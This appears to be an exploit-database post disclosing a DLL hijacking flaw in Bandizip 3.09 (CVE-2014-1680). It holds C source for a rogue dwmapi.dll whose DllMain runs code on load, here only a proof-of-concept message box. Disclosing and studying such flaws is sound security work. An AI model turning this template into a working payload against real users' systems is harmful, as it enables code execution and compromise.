Home / exploits Bandizip 3.09 DLL Hijack
Posted on 06 February 2014
/* * Exploit Title: Bandizip 3.09 DLL Hijacking Exploit (dwmapi.dll) * Date: February 5th 2014 * Author: Osanda Malith Jayathissa * E-Mail: osandajayathissa<at>gmail.com * Version: 3.09 * Vendor Homepage: http://www.bandisoft.com/ * Tested on: Windows XP SP2 en * Vulnerable extensions: All Extensions * CVE: CVE-2014-1680 */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "Bandizip DLL Hijacked Osanda Malith", "POC", MB_OK); }
